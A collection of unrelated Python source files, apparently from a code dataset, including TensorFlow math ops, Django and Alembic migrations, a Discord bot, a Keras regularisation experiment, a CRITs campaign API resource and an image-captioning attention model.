return ops.SparseTensor(indices=x.indices, values=x_tanh, shape=x.shape)
else:
return gen_math_ops._tanh(x, name=name)
def cumsum(x, axis=0, exclusive=False, reverse=False, name=None):
"""Compute the cumulative sum of the tensor `x` along `axis`.
By default, this op performs an inclusive cumsum, which means that the first
element of the input is identical to the first element of the output:
```prettyprint
tf.cumsum([a, b, c]) ==> [a, a + b, a + b + c]
```
By setting the `exclusive` kwarg to `True`, an exclusive cumsum is performed
instead:
```prettyprint
tf.cumsum([a, b, c], exclusive=True) ==> [0, a, a + b]
```
By setting the `reverse` kwarg to `True`, the cumsum is performed in the
opposite direction:
```prettyprint
tf.cumsum([a, b, c], reverse=True) ==> [a + b + c, b + c, c]
```
This is more efficient than using separate `tf.reverse` ops.
The `reverse` and `exclusive` kwargs can also be combined:
```prettyprint
tf.cumsum([a, b, c], exclusive=True, reverse=True) ==> [b + c, c, 0]
```
Args:
x: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int64`, `int32`, `uint8`, `uint16`, `int16`, `int8`, `complex64`,
`complex128`, `qint8`, `quint8`, `qint32`, `half`.
axis: A `Tensor` of type `int32` (default: 0).
reverse: A `bool` (default: False).
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
with ops.name_scope(name, "Cumsum", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops.cumsum(
x, axis, exclusive=exclusive, reverse=reverse, name=name)
def cumprod(x, axis=0, exclusive=False, reverse=False, name=None):
"""Compute the cumulative product of the tensor `x` along `axis`.
By default, this op performs an inclusive cumprod, which means that the
first
element of the input is identical to the first element of the output:
```prettyprint
tf.cumprod([a, b, c]) ==> [a, a * b, a * b * c]
```
By setting the `exclusive` kwarg to `True`, an exclusive cumprod is
performed
instead:
```prettyprint
tf.cumprod([a, b, c], exclusive=True) ==> [1, a, a * b]
```
By setting the `reverse` kwarg to `True`, the cumprod is performed in the
opposite direction:
```prettyprint
tf.cumprod([a, b, c], reverse=True) ==> [a * b * c, b * c, c]
```
This is more efficient than using separate `tf.reverse` ops.
The `reverse` and `exclusive` kwargs can also be combined:
```prettyprint
tf.cumprod([a, b, c], exclusive=True, reverse=True) ==> [b * c, c, 1]
```
Args:
x: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int64`, `int32`, `uint8`, `uint16`, `int16`, `int8`, `complex64`,
`complex128`, `qint8`, `quint8`, `qint32`, `half`.
axis: A `Tensor` of type `int32` (default: 0).
reverse: A `bool` (default: False).
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
with ops.name_scope(name, "Cumprod", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
return gen_math_ops.cumprod(
x, axis, exclusive=exclusive, reverse=reverse, name=name)
def conj(x, name=None):
r"""Returns the complex conjugate of a complex number.
Given a tensor `input` of complex numbers, this operation returns a tensor of
complex numbers that are the complex conjugate of each element in `input`. The
complex numbers in `input` must be of the form \\(a + bj\\), where *a* is the
real part and *b* is the imaginary part.
The complex conjugate returned by this operation is of the form \\(a - bj\\).
For example:
# tensor 'input' is [-2.25 + 4.75j, 3.25 + 5.75j]
tf.conj(input) ==> [-2.25 - 4.75j, 3.25 - 5.75j]
If `x` is real, it is returned unchanged.
Args:
x: `Tensor` to conjugate. Must have numeric type.
name: A name for the operation (optional).
Returns:
A `Tensor` that is the conjugate of `x` (with the same type).
Raises:
TypeError: If `x` is not a numeric tensor.
"""
with ops.name_scope(name, "Conj", [x]) as name:
x = ops.convert_to_tensor(x, name="x")
if x.dtype.is_complex:
return gen_math_ops._conj(x, name=name)
elif x.dtype.is_floating or x.dtype.is_integer:
return x
else:
raise TypeError("Expected numeric tensor, got dtype %r" % x.dtype)
ops.RegisterShape("Abs")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Acos")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Asin")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Atan")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Ceil")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Conj")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cos")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cross")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Exp")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Floor")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Imag")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Inv")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IsFinite")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IsInf")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IsNan")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Log")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LogicalNot")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Neg")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Real")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Rsqrt")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sign")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sin")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sqrt")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Square")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sigmoid")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Tanh")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Tan")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Lgamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Digamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Erf")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Erfc")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cast")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("ComplexAbs")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FFT")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IFFT")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FFT2D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IFFT2D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FFT3D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("IFFT3D")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("TanhGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SigmoidGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("InvGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SqrtGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("RsqrtGrad")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cumsum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Cumprod")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Add")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Complex")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Div")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Equal")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Greater")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("GreaterEqual")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Igamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Igammac")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Zeta")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Polygamma")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Less")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LessEqual")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LogicalAnd")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("LogicalOr")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Maximum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Minimum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Mod")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FloorMod")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("FloorDiv")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Mul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("NotEqual")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Pow")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Sub")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SquaredDifference")(common_shapes.call_cpp_shape_fn)
def _BroadcastShape(op):
"""Common shape function for binary operators that broadcast their inputs."""
return [common_shapes.broadcast_shape(
op.inputs[0].get_shape(),
op.inputs[1].get_shape())]
ops.RegisterShape("Betainc")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseDenseCwiseMul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseDenseCwiseDiv")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseDenseCwiseAdd")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("AddN")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Select")(common_shapes.call_cpp_shape_fn)
@ops.RegisterShape("ArgMax")
@ops.RegisterShape("ArgMin")
def _ArgOpShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[1])
@ops.RegisterShape("All")
@ops.RegisterShape("Any")
@ops.RegisterShape("Max")
@ops.RegisterShape("Mean")
@ops.RegisterShape("Min")
@ops.RegisterShape("Prod")
@ops.RegisterShape("Sum")
def _ReductionShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[1])
ops.RegisterShape("SegmentMax")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentMean")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentMin")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentProd")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SegmentSum")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseSegmentMean")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseSegmentSqrtN")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("SparseSegmentSum")(common_shapes.call_cpp_shape_fn)
@ops.RegisterShape("SparseSegmentMeanGrad")
@ops.RegisterShape("SparseSegmentSqrtNGrad")
# pylint: disable=invalid-name
def _SparseSegmentReductionGradShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[3])
# pylint: enable=invalid-name
@ops.RegisterShape("UnsortedSegmentSum")
def _UnsortedSegmentSumShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[2])
@ops.RegisterShape("LinSpace")
def _LinspaceShape(op):
return common_shapes.call_cpp_shape_fn(op, input_tensors_needed=[2])
def reduced_shape(input_shape, axes):
"""Helper function for reduction ops.
Args:
input_shape: 1-D Tensor, the shape of the Tensor being reduced.
axes: 1-D Tensor, the reduction axes.
Returns:
A 1-D Tensor, the output shape as if keep_dims were set to True.
"""
# Example:
# cast needed for SparseTensor reductions
input_shape = to_int32(input_shape) # [2, 3, 5, 7]
axes = to_int32(axes) # [1, 2]
input_rank = array_ops.size(input_shape) # 4
axes = (axes + input_rank) % input_rank
axes_shape = array_ops.shape(axes) # [2]
return gen_data_flow_ops.dynamic_stitch( # [2, 1, 1, 7]
[range(input_rank), # [0, 1, 2, 3]
axes], # [1, 2]
[input_shape, # [2, 3, 5, 7]
array_ops.fill(axes_shape, 1)]) # [1, 1]
ops.RegisterShape("QuantizedMatMul")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("Requantize")(common_shapes.call_cpp_shape_fn)
ops.RegisterShape("RequantizationRange")(common_shapes.call_cpp_shape_fn)
|
py | 1a34649f729795b6f504bc96bdffca365513aa47 | """Auto-generated file, do not edit by hand. LS metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_LS = PhoneMetadata(id='LS', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='1\\d\\d', possible_length=(3,)),
toll_free=PhoneNumberDesc(national_number_pattern='11[257]', example_number='112', possible_length=(3,)),
emergency=PhoneNumberDesc(national_number_pattern='11[257]', example_number='112', possible_length=(3,)),
short_code=PhoneNumberDesc(national_number_pattern='11[257]', example_number='112', possible_length=(3,)),
short_data=True)
|
py | 1a34654aaf5bdb9118b16aca61378813cdffb2e5 | # Generated by Django 2.0.9 on 2018-10-30 17:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('knigi', '0002_auto_20181030_0907'),
]
operations = [
migrations.RemoveField(
model_name='book',
name='sold_at',
),
migrations.RemoveField(
model_name='inventory',
name='in_stock',
),
migrations.AddField(
model_name='inventory',
name='stock',
field=models.PositiveIntegerField(blank=True, default=0),
),
migrations.AddField(
model_name='store',
name='books',
field=models.ManyToManyField(blank=True, through='knigi.Inventory', to='knigi.Book'),
),
migrations.AlterField(
model_name='inventory',
name='sold',
field=models.PositiveIntegerField(blank=True, default=0),
),
]
|
py | 1a3465e02c795478547e826be2e5d779fb1091e9 | from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('dcim', '0111_component_template_description'),
]
operations = [
# Set max_length=64 for all name fields
migrations.AlterField(
model_name='consoleport',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='consoleporttemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='consoleserverport',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='consoleserverporttemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='devicebay',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='devicebaytemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='inventoryitem',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='poweroutlet',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='poweroutlettemplate',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='powerport',
name='name',
field=models.CharField(max_length=64),
),
migrations.AlterField(
model_name='powerporttemplate',
name='name',
field=models.CharField(max_length=64),
),
# Update related_name for necessary component and component template models
migrations.AlterField(
model_name='consoleporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consoleporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='consoleserverporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consoleserverporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='devicebay',
name='device',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='devicebays', to='dcim.Device'),
),
migrations.AlterField(
model_name='devicebaytemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='devicebaytemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='frontporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='frontporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='interfacetemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interfacetemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='inventoryitem',
name='device',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inventoryitems', to='dcim.Device'),
),
migrations.AlterField(
model_name='poweroutlettemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='poweroutlettemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='powerporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='powerporttemplates', to='dcim.DeviceType'),
),
migrations.AlterField(
model_name='rearporttemplate',
name='device_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='rearporttemplates', to='dcim.DeviceType'),
),
]
|
py | 1a346668abc023308ef21224b24ca11661c211a9 | import discord
import os
from discord.ext import commands, tasks
from discord.utils import get
from discord.ext.commands import CheckFailure
from discord.ext.commands import MissingPermissions
import random
from alive import alive
import json
intents = discord.Intents.all()
intents.members = True
def get_prefix(client, message):
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
return prefixes[str(message.guild.id)]
bot = commands.Bot(command_prefix=get_prefix, intents=intents)
bot.remove_command('help')
my_secret = os.environ['Token']
@bot.event
async def on_guild_join(guild):
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
prefixes[str(guild.id)] = ">"
with open("prefixes.json", "w") as f:
json.dump(prefixes, f, indent = 4)
@bot.event
async def on_guild_remove(guild):
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
prefixes.pop(str(guild.id))
with open("prefixes.json", "w") as f:
json.dump(prefixes, f, indent = 4)
#ChangePrefix
@bot.command()
@commands.has_permissions(manage_messages=True)
async def prefix(ctx, prefix):
with open ("prefixes.json", "r") as f:
prefixes = json.load(f)
prefixes[str(ctx.guild.id)] = prefix
await ctx.send("The prefix has been changed to: "+ prefix)
with open("prefixes.json", "w") as f:
json.dump(prefixes, f, indent = 4)
@prefix.error
async def prefix_error(ctx, error):
if isinstance (error, commands.MissingRequiredArgument):
await ctx.send('Please enter a prefix.')
if isinstance (error, commands.MissingPermissions):
await ctx.send('Aha comrade, that one is not for you.')
@bot.event
async def on_ready():
print("Bot is ready.")
await bot.change_presence(status=discord.Status.online, activity=discord.Game('Having A Midlife Crisis...'))
#join_message
@bot.event
async def on_member_join(member):
guild_id = member.guild.id
av = member.avatar_url
if guild_id == 842401531171962911:
channel = bot.get_channel(853879745263566898)
e = discord.Embed(color = discord.Color.green())
e.set_thumbnail(url=av)
e.add_field(name="Welcome!!", value=f"Welcome to the server {member.mention}!! Hope you have a good time! If you need any help regarding discord, please contact and admins or mods. If you need any help regarding questions, don't hesitate to ask in the doubt channels . And at last, please check self-roles at <#842413732167811152>")
await channel.send(embed=e)
else:
print('Currently Thinking.')
#server_leave
@bot.event
async def on_member_remove(member):
guild_id = member.guild.id
if guild_id == 842401531171962911:
channel = bot.get_channel(842607234160525334)
e = discord.Embed(color = discord.Colour.red())
e.set_thumbnail(url=member.avatar_url)
e.add_field(name="Member Left", value = f"{member} Has left the server.")
await channel.send(embed=e)
else:
print("Currently thinking.")
#NoCommandError
@bot.event
async def on_command_error(ctx, error):
if isinstance(error, commands.CommandNotFound):
await ctx.send('No such command exists!')
#Welcome
@bot.command()
async def welcome(ctx):
await ctx.send(f'Welcome to the server!! Hope you have a good time! For help regarding Discord, please go to <#846802868215218177>. For any subject-regarded help please go to the respective doubts channel in the Doubts category. For a general chit-chat with our community, have fun at <#842407125329903616>!')
#CogLoad
@bot.command()
@commands.has_role('Owner')
async def load(ctx, extension):
bot.load_extension(f'cogs.{extension}')
@load.error
async def load_error(ctx, error):
if isinstance(error, commands.MissingRole):
await ctx.send('Sorry, but you do not have perms to use that command!')
#CogUnload
@bot.command()
@commands.has_role('Owner')
async def unload(ctx, extension):
bot.unload_extension(f'cogs.{extension}')
@unload.error
async def unload_error(ctx, error):
if isinstance(error, commands.MissingRole):
await ctx.send('Sorry, but you do not have perms to use that command!')
#CogReload
@bot.command()
@commands.has_role('Owner')
async def reload(ctx, extension):
bot.unload_extension(f'cogs.{extension}')
bot.load_extension(f'cogs.{extension}')
@reload.error
async def reload_error(ctx, error):
if isinstance(error, commands.MissingRole):
await ctx.send('Sorry, but you do not have perms to use that command!')
#Ping
@bot.command()
async def ping(ctx):
await ctx.send(f'Pong! {round(bot.latency*1000)}ms.')
#GitHub
@bot.command()
async def github(ctx):
embed = discord.Embed(title="GitHub Repo Link", color=discord.Colour.orange())
embed.add_field(name="Hydra Bot", value="https://github.com/doughnut9/Discord-Multipurpose-Bot" )
await ctx.send(embed=embed)
for filename in os.listdir('./cogs'):
if filename.endswith('.py'):
bot.load_extension(f'cogs.{filename[:-3]}')
alive()
bot.run(os.getenv('Token'))
|
py | 1a34687f48cec595d3161ef255fc0f95b014f004 | #!/usr/bin/python
import tensorflow as tf
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, BatchNormalization, Dropout
PARAMETER_EXPERIMENTS = ['l1_scalar', 'l2_scalar', 'fc_dropout_rate']#e.g. dropout rate
class Network:
def __init__(self, experimentType, **kwargs):
self.validExperimentTypes = ['control', 'batchnorm', 'dropout', 'l2', 'l1']
assert(experimentType in self.validExperimentTypes), ("Invalid experiment type.. Please choose from:\n" + str(self.validExperimentTypes))
self.experimentType = experimentType
l_scalars = 0.001
self.l1_scalar = kwargs['l1_scalar'] if 'l1_scalar' in kwargs else l_scalars
self.l2_scalar = kwargs['l2_scalar'] if 'l2_scalar' in kwargs else l_scalars
self.fc_dropout_rate = kwargs['fc_dropout_rate'] if 'fc_dropout_rate' in kwargs else .5
print(kwargs)
self.build()
def build(self):
regularizer = None
if self.experimentType == 'l2':
regularizer = tf.keras.regularizers.l2(self.l2_scalar)
elif self.experimentType == 'l1':
regularizer = tf.keras.regularizers.l1(self.l1_scalar)
model = tf.keras.Sequential()
# Must define the input shape in the first layer of the neural network
model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu', input_shape=(28,28,1), kernel_regularizer=regularizer))
if self.experimentType == "batchnorm":
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu', kernel_regularizer=regularizer))
if self.experimentType == "batchnorm":
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=2))
model.add(Flatten())
model.add(Dense(256, activation='relu', kernel_regularizer=regularizer))
if self.experimentType == 'dropout':
model.add(Dropout(self.fc_dropout_rate))
if self.experimentType == "batchnorm":
model.add(BatchNormalization())
model.add(Dense(10, activation='softmax', kernel_regularizer=regularizer))
# Take a look at the model summary
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
self.model = model
def train(self, x_train, y_train, x_valid, y_valid, batchSize, epochs):
return self.model.fit(x_train, y_train, batch_size=batchSize, epochs=epochs, validation_data=(x_valid, y_valid)).history
def test(self, x_test, y_test):
# Evaluate the model on test set
score = self.model.evaluate(x_test, y_test, verbose=0)
# Print test accuracy
print score
print('\n', 'Test accuracy:', score[1])
return score[1]
if __name__ == "__main__":
net = Network('l1')
|
py | 1a346971efea37ba3221dbdc8a7334f646b5d37a | from register.models import jfuser,jfcompany,jfadmin,usercompany
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django.shortcuts import render_to_response
from django.shortcuts import render
from django.http import Http404, HttpResponseRedirect, HttpResponse
# Create your views here.
|
py | 1a346fbb45181bc8f463a71540555eea4c33f626 | """users table
Revision ID: 6c6be1ace116
Revises:
Create Date: 2021-08-26 21:28:47.593295
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6c6be1ace116'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=64), nullable=True),
sa.Column('email', sa.String(length=120), nullable=True),
sa.Column('password_hash', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)
op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_user_username'), table_name='user')
op.drop_index(op.f('ix_user_email'), table_name='user')
op.drop_table('user')
# ### end Alembic commands ###
|
py | 1a3471102f0e8f1d36b61e63189e30dc879aad53 | # -*- coding: utf-8 -*-
from functools import wraps
class ApiException(Exception):
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return "Message: %s Status code: %d" % (self.message, self.code)
|
py | 1a34722bb3b0a36c036e8aea14e9be3c5c62f435 | from django.core.urlresolvers import reverse
from tastypie import authorization
from tastypie.authentication import MultiAuthentication
from tastypie.exceptions import BadRequest
from crits.campaigns.campaign import Campaign
from crits.campaigns.handlers import add_campaign
from crits.core.api import CRITsApiKeyAuthentication, CRITsSessionAuthentication
from crits.core.api import CRITsSerializer, CRITsAPIResource
class CampaignResource(CRITsAPIResource):
"""
Class to handle everything related to the Campaign API.
Currently supports GET and POST.
"""
class Meta:
object_class = Campaign
allowed_methods = ('get', 'post')
resource_name = "campaigns"
authentication = MultiAuthentication(CRITsApiKeyAuthentication(),
CRITsSessionAuthentication())
authorization = authorization.Authorization()
serializer = CRITsSerializer()
def get_object_list(self, request):
"""
Use the CRITsAPIResource to get our objects but provide the class to get
the objects from.
:param request: The incoming request.
:type request: :class:`django.http.HttpRequest`
:returns: Resulting objects in the specified format (JSON by default).
"""
return super(CampaignResource, self).get_object_list(request, Campaign,
False)
def obj_create(self, bundle, **kwargs):
"""
Handles creating Campaigns through the API.
:param bundle: Bundle containing the information to create the Campaign.
:type bundle: Tastypie Bundle object.
:returns: HttpResponse.
"""
analyst = bundle.request.user.username
name = bundle.data.get('name', None)
description = bundle.data.get('description', None)
aliases = bundle.data.get('aliases', None)
bucket_list = bundle.data.get('bucket_list', None)
ticket = bundle.data.get('ticket', None)
content = {'return_code': 1,
'type': 'Campaign'}
if not name:
content['message'] = 'Need a Campaign name.'
self.crits_response(content)
result = add_campaign(name,
description,
aliases,
analyst,
bucket_list,
ticket)
if result.get('id'):
url = reverse('api_dispatch_detail',
kwargs={'resource_name': 'campaigns',
'api_name': 'v1',
'pk': result.get('id')})
content['url'] = url
content['id'] = result.get('id')
if result['success']:
content['return_code'] = 0
content['message'] = result['message']
self.crits_response(content)
|
py | 1a34722f56062a05da921394cadb14eeebc52852 | # This file contains Att2in2, AdaAtt, AdaAttMO, TopDown model
# AdaAtt is from Knowing When to Look: Adaptive Attention via A Visual Sentinel for Image Captioning
# https://arxiv.org/abs/1612.01887
# AdaAttMO is a modified version with maxout lstm
# Att2in is from Self-critical Sequence Training for Image Captioning
# https://arxiv.org/abs/1612.00563
# In this file we only have Att2in2, which is a slightly different version of att2in,
# in which the img feature embedding and word embedding is the same as what in adaatt.
# TopDown is from Bottom-Up and Top-Down Attention for Image Captioning and VQA
# https://arxiv.org/abs/1707.07998
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import *
import misc.utils as utils
from .CaptionModel import CaptionModel
class AttModel(CaptionModel):
def __init__(self, opt):
super(AttModel, self).__init__()
self.vocab_size = opt.vocab_size
self.input_encoding_size = opt.input_encoding_size
#self.rnn_type = opt.rnn_type
self.rnn_size = opt.rnn_size
self.num_layers = opt.num_layers
self.drop_prob_lm = opt.drop_prob_lm
self.seq_length = opt.seq_length
self.fc_feat_size = opt.fc_feat_size
self.att_feat_size = opt.att_feat_size
self.att_hid_size = opt.att_hid_size
self.ss_prob = 0.0 # Schedule sampling probability
self.embed = nn.Sequential(nn.Embedding(self.vocab_size + 1, self.input_encoding_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.fc_embed = nn.Sequential(nn.Linear(self.fc_feat_size, self.rnn_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.att_embed = nn.Sequential(nn.Linear(self.att_feat_size, self.rnn_size),
nn.ReLU(),
nn.Dropout(self.drop_prob_lm))
self.logit = nn.Linear(self.rnn_size, self.vocab_size + 1)
self.ctx2att = nn.Linear(self.rnn_size, self.att_hid_size)
def init_hidden(self, bsz):
weight = next(self.parameters()).data
return (Variable(weight.new(self.num_layers, bsz, self.rnn_size).zero_()),
Variable(weight.new(self.num_layers, bsz, self.rnn_size).zero_()))
def forward(self, fc_feats, att_feats, seq):
batch_size = fc_feats.size(0)
state = self.init_hidden(batch_size)
outputs = []
# embed fc and att feats
fc_feats = self.fc_embed(fc_feats)
_att_feats = self.att_embed(att_feats.view(-1, self.att_feat_size))
att_feats = _att_feats.view(*(att_feats.size()[:-1] + (self.rnn_size,)))
# Project the attention feats first to reduce memory and computation comsumptions.
p_att_feats = self.ctx2att(att_feats.view(-1, self.rnn_size))
p_att_feats = p_att_feats.view(*(att_feats.size()[:-1] + (self.att_hid_size,)))
for i in range(seq.size(1) - 1):
if self.training and i >= 1 and self.ss_prob > 0.0: # otherwiste no need to sample
sample_prob = fc_feats.data.new(batch_size).uniform_(0, 1)
sample_mask = sample_prob < self.ss_prob
if sample_mask.sum() == 0:
it = seq[:, i].clone()
else:
sample_ind = sample_mask.nonzero().view(-1)
it = seq[:, i].data.clone()
#prob_prev = torch.exp(outputs[-1].data.index_select(0, sample_ind)) # fetch prev distribution: shape Nx(M+1)
#it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1))
prob_prev = torch.exp(outputs[-1].data) # fetch prev distribution: shape Nx(M+1)
it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1).index_select(0, sample_ind))
it = Variable(it, requires_grad=False)
else:
it = seq[:, i].clone()
# break if all the sequences end
if i >= 1 and seq[:, i].data.sum() == 0:
break
xt = self.embed(it)
output, state = self.core(xt, fc_feats, att_feats, p_att_feats, state)
output = F.log_softmax(self.logit(output))
outputs.append(output)
return torch.cat([_.unsqueeze(1) for _ in outputs], 1)
def get_logprobs_state(self, it, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, state):
# 'it' is Variable contraining a word index
xt = self.embed(it)
output, state = self.core(xt, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, state)
